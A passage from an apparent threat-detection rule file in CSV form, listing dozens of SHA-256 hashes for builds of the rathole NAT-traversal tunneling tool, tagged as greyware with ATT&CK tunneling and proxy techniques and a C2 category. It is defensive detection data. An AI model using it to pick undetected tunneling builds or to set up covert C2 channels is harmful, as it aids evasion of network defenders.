TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*85bf085697ae96895b2ddf719c382e1647b4f17f4f4dc216dd89da79783dcd87*",".{0,1000}85bf085697ae96895b2ddf719c382e1647b4f17f4f4dc216dd89da79783dcd87.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*894368f2b42eac9feee89560aa890c1215883b716232c66f20bf4145d6bbf671*",".{0,1000}894368f2b42eac9feee89560aa890c1215883b716232c66f20bf4145d6bbf671.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*8a1ad5d4fc59693ea546bc7d9dfb9881cf33e48070907a5d7ca1b3643fb42590*",".{0,1000}8a1ad5d4fc59693ea546bc7d9dfb9881cf33e48070907a5d7ca1b3643fb42590.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*8b4cda04c1c75474ce2c59d9acbc32f83deaa0a0b6ce16aff15948ebddfec63e*",".{0,1000}8b4cda04c1c75474ce2c59d9acbc32f83deaa0a0b6ce16aff15948ebddfec63e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*8d2d38ec00ce9c7b59d7fb058a05709c6ecf7628cf9fcfc560c475691badc533*",".{0,1000}8d2d38ec00ce9c7b59d7fb058a05709c6ecf7628cf9fcfc560c475691badc533.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*8d800107c780c3f726b3768f5db0daa1a6d3d7ae0a505a8ea93fe554a4749294*",".{0,1000}8d800107c780c3f726b3768f5db0daa1a6d3d7ae0a505a8ea93fe554a4749294.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*8f722963b5b107b2856cb4169ed16aaf5b823df9795bf4dd11b97d644fa39347*",".{0,1000}8f722963b5b107b2856cb4169ed16aaf5b823df9795bf4dd11b97d644fa39347.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*8fc95d849e66592d8a52f98f28c2d7443b8b2057fc6bafe2a5fca05251507300*",".{0,1000}8fc95d849e66592d8a52f98f28c2d7443b8b2057fc6bafe2a5fca05251507300.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*90f66748d7cafe4e995a0ebcb7e7e10b84454618f02cc9dfdcb0bdfa01000642*",".{0,1000}90f66748d7cafe4e995a0ebcb7e7e10b84454618f02cc9dfdcb0bdfa01000642.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*921cf5b205e08c55b7d72439f0f27c4436cad9624493adedaec15a0283608d37*",".{0,1000}921cf5b205e08c55b7d72439f0f27c4436cad9624493adedaec15a0283608d37.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*921e9e63dabdae842d71d8f7e856d50e0bb25fa9e4e8aa40ac248b88fb4cb808*",".{0,1000}921e9e63dabdae842d71d8f7e856d50e0bb25fa9e4e8aa40ac248b88fb4cb808.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*92cc3feb57149c0b4dba7ec198dbda26c4831cde0a7c74a7d9f51e0002f65ead*",".{0,1000}92cc3feb57149c0b4dba7ec198dbda26c4831cde0a7c74a7d9f51e0002f65ead.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*933c42cc2516eb49b1af6e7a601b79e3e993c192ed3c50b7a96d22398197dc96*",".{0,1000}933c42cc2516eb49b1af6e7a601b79e3e993c192ed3c50b7a96d22398197dc96.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*95663244ae0b98220f0e0075980c0da70094a06638fb4498515857e92e3f8b56*",".{0,1000}95663244ae0b98220f0e0075980c0da70094a06638fb4498515857e92e3f8b56.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*95f005945eac00f3412ffc59d7c6bdfce751fcaac307f4b599ae917e98841766*",".{0,1000}95f005945eac00f3412ffc59d7c6bdfce751fcaac307f4b599ae917e98841766.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*9a49111f3b3fcd8f1f7c1ecfe79c3d10dc6ba4e7595e0bc776fb328f70f68705*",".{0,1000}9a49111f3b3fcd8f1f7c1ecfe79c3d10dc6ba4e7595e0bc776fb328f70f68705.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*9c3286d0cb644bc2ffdff9dacb89b6d1b87dabbde373a52e45b73717fcc97664*",".{0,1000}9c3286d0cb644bc2ffdff9dacb89b6d1b87dabbde373a52e45b73717fcc97664.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*9d6d883e78e055575e91b222042d50bb7a9d9e4f046257bc7c38e7f57deb552e*",".{0,1000}9d6d883e78e055575e91b222042d50bb7a9d9e4f046257bc7c38e7f57deb552e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*9f1df2f4b8d5719321755917aa858e159ead67978a568196bde136759e9dcb2b*",".{0,1000}9f1df2f4b8d5719321755917aa858e159ead67978a568196bde136759e9dcb2b.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*a0038697d35fbe64f1d9edc3493da99bdd0f27f7a79502134605c3064b2c704e*",".{0,1000}a0038697d35fbe64f1d9edc3493da99bdd0f27f7a79502134605c3064b2c704e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*a131448308aacfd65d51f1a3861ccee0fd68640ed2694421871d46cd1216367b*",".{0,1000}a131448308aacfd65d51f1a3861ccee0fd68640ed2694421871d46cd1216367b.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*a2a82a2374bd7e6ade1645b0460c385b124bc7cce906c736f0b067ab21f0edaf*",".{0,1000}a2a82a2374bd7e6ade1645b0460c385b124bc7cce906c736f0b067ab21f0edaf.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*a355fed40b126e5a6fe1963d63bb12397f6fd5a88f0e67a4325dafa925229e56*",".{0,1000}a355fed40b126e5a6fe1963d63bb12397f6fd5a88f0e67a4325dafa925229e56.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*a3ac47f75e01e2efedea26ee4cf9ef3b4f45d12c45dd429438e03224c055832c*",".{0,1000}a3ac47f75e01e2efedea26ee4cf9ef3b4f45d12c45dd429438e03224c055832c.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*a4b0f3f35a5fb57515736985a37f348b9a3303515d5c381ecf95f3422f124da5*",".{0,1000}a4b0f3f35a5fb57515736985a37f348b9a3303515d5c381ecf95f3422f124da5.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*a581c3c813327c36e97ca933d0169224d82a428b596b1d64492b06108ac4b97d*",".{0,1000}a581c3c813327c36e97ca933d0169224d82a428b596b1d64492b06108ac4b97d.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*a6d0d66175c5968762fcb0cb5b967cb7add0ca4b11fa276899cf8de9a1c20c7f*",".{0,1000}a6d0d66175c5968762fcb0cb5b967cb7add0ca4b11fa276899cf8de9a1c20c7f.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*a6d80ede0043ee980ff8f7f70acabb0e318c18d4514f90a131250232b33f2933*",".{0,1000}a6d80ede0043ee980ff8f7f70acabb0e318c18d4514f90a131250232b33f2933.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*a73d83dd80d910135838437fc31497f5a865c8021c38cebe29805c237115a995*",".{0,1000}a73d83dd80d910135838437fc31497f5a865c8021c38cebe29805c237115a995.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*a7c2394f127db053d7da7e57353e017b319406f6474ff0318a8545c85cf55d80*",".{0,1000}a7c2394f127db053d7da7e57353e017b319406f6474ff0318a8545c85cf55d80.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*a8392f36da158c474403c3fee97076c704714db05735b0c23bec268d591e27b2*",".{0,1000}a8392f36da158c474403c3fee97076c704714db05735b0c23bec268d591e27b2.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*aafc9e58277f79e98ea146c55da484c7524d7e56b13cb189102e8438f510edbb*",".{0,1000}aafc9e58277f79e98ea146c55da484c7524d7e56b13cb189102e8438f510edbb.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*ace8104c5e20d3ff08efbb7ccc7a17421fa620ad0130a2f96642d38bcbf2de45*",".{0,1000}ace8104c5e20d3ff08efbb7ccc7a17421fa620ad0130a2f96642d38bcbf2de45.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*ad1cdabfb431402a99e40c0a9d932fe2153d8a26dc3be0e3a0a3a6736989b2d4*",".{0,1000}ad1cdabfb431402a99e40c0a9d932fe2153d8a26dc3be0e3a0a3a6736989b2d4.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*ad62f18dcc34d56d48931cf7559bcb64e46e71feaf7e62ba8608ed38fc115937*",".{0,1000}ad62f18dcc34d56d48931cf7559bcb64e46e71feaf7e62ba8608ed38fc115937.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*ae33a0a1e4918c394acfd08d99853492fc97b9abafb4257fa739b6876a807950*",".{0,1000}ae33a0a1e4918c394acfd08d99853492fc97b9abafb4257fa739b6876a807950.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*aec887efef96f1f2ef41197b37806768476df4319c5f9a9cccac582e44f9893d*",".{0,1000}aec887efef96f1f2ef41197b37806768476df4319c5f9a9cccac582e44f9893d.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*aedb3bc27109fe131c2e5fcd778b9f30b864ac438f9252266492ba83ae0b73f8*",".{0,1000}aedb3bc27109fe131c2e5fcd778b9f30b864ac438f9252266492ba83ae0b73f8.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*b084b50bb95806e54bd010fa7e2663adfae267d4baea1b590b8f97a66ae730f9*",".{0,1000}b084b50bb95806e54bd010fa7e2663adfae267d4baea1b590b8f97a66ae730f9.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*b14b44b9a2346327ab1debd3d56028c3f861821666cbddb6c084e72ded0cb662*",".{0,1000}b14b44b9a2346327ab1debd3d56028c3f861821666cbddb6c084e72ded0cb662.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*b4ae7e04d503aacbe2bcaf751c159d258fb4f199ccb3b5c2e0587531af6d3c4f*",".{0,1000}b4ae7e04d503aacbe2bcaf751c159d258fb4f199ccb3b5c2e0587531af6d3c4f.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*b5bed9e86f1fcce890d35bf0f75dcdabe99dece7a1b5af2f1cafb1af5104ec66*",".{0,1000}b5bed9e86f1fcce890d35bf0f75dcdabe99dece7a1b5af2f1cafb1af5104ec66.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*b60aca868ccb04dd0116edeae8430c93be5dda4410f766d137d22dc02f9dce6e*",".{0,1000}b60aca868ccb04dd0116edeae8430c93be5dda4410f766d137d22dc02f9dce6e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*b6bb35e5bb724ced8d8d7da596f060ec650909eba12e38b5c40bcf32ed5e0ac2*",".{0,1000}b6bb35e5bb724ced8d8d7da596f060ec650909eba12e38b5c40bcf32ed5e0ac2.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*b76e232b8d3bb64d981b3a90fc81d1cf4e737fe28dfcfb41e37054a48ed326c2*",".{0,1000}b76e232b8d3bb64d981b3a90fc81d1cf4e737fe28dfcfb41e37054a48ed326c2.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*bb57a815d8a4aae884fe930b7a0daa6c408b60d932286fd060a4cf61ee79e01a*",".{0,1000}bb57a815d8a4aae884fe930b7a0daa6c408b60d932286fd060a4cf61ee79e01a.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*bc375342f9360b0b5cbcb5a3701c301eaf577ec8ab5d1796cf10908d315edf72*",".{0,1000}bc375342f9360b0b5cbcb5a3701c301eaf577ec8ab5d1796cf10908d315edf72.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*bc4447977cdc9a765c2d6b61aada0fa40f45435aa68b193729cf4e7d8a94e891*",".{0,1000}bc4447977cdc9a765c2d6b61aada0fa40f45435aa68b193729cf4e7d8a94e891.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*bc680f0aa5ee457d60cb9d660071b3bb393f31c05c0e7fd7b89b39584ba25619*",".{0,1000}bc680f0aa5ee457d60cb9d660071b3bb393f31c05c0e7fd7b89b39584ba25619.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*bd158af8aa25d8f7123030620494c3296b96e56a1cc387bdf2274635335be867*",".{0,1000}bd158af8aa25d8f7123030620494c3296b96e56a1cc387bdf2274635335be867.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*bd7eb45070c8a4e1595e9daaf55bfc331e5ada1244c4ed496b89225e22429cf7*",".{0,1000}bd7eb45070c8a4e1595e9daaf55bfc331e5ada1244c4ed496b89225e22429cf7.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*bef64b382548fdcd24b4736f6a92c5c68e5b8555c897ed27d83ecf50f8117486*",".{0,1000}bef64b382548fdcd24b4736f6a92c5c68e5b8555c897ed27d83ecf50f8117486.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*c0386231b4e1b594981b572cd9859cde3f7fadd74729ef51107cd65999aa8f9e*",".{0,1000}c0386231b4e1b594981b572cd9859cde3f7fadd74729ef51107cd65999aa8f9e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*c1e6d0a41a0af8589303ab6940937d9183b344a62283ff6033a17e82c357ce17*",".{0,1000}c1e6d0a41a0af8589303ab6940937d9183b344a62283ff6033a17e82c357ce17.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*c1fcfdac8ef03a170f6ec0f7baa30a470c61585c6e78a59cd73e6d50c9e6f5f9*",".{0,1000}c1fcfdac8ef03a170f6ec0f7baa30a470c61585c6e78a59cd73e6d50c9e6f5f9.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*c3d9753c93a5a4f6fdfd7c5146ffcb2ae4b733926b0ae3fff899d3b0851e0f60*",".{0,1000}c3d9753c93a5a4f6fdfd7c5146ffcb2ae4b733926b0ae3fff899d3b0851e0f60.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*c45bff01783f3f79df4d0c43b404ab3293e4e351fa760d7c9500200d5771d73a*",".{0,1000}c45bff01783f3f79df4d0c43b404ab3293e4e351fa760d7c9500200d5771d73a.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*c518a96dc78f8a6fb2ccecb02c5ab09bb41f0e04c8f7e7de8b87b3392d3083d7*",".{0,1000}c518a96dc78f8a6fb2ccecb02c5ab09bb41f0e04c8f7e7de8b87b3392d3083d7.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*c5fb70cf2c8a3681d7e8397c8ac82c119f5bd64055dd47432c5e5672ce9a3986*",".{0,1000}c5fb70cf2c8a3681d7e8397c8ac82c119f5bd64055dd47432c5e5672ce9a3986.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*c793af04a5ffa53c8dcde8f9453b312e40168de4081d64cbead076b8e7fcb0b9*",".{0,1000}c793af04a5ffa53c8dcde8f9453b312e40168de4081d64cbead076b8e7fcb0b9.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
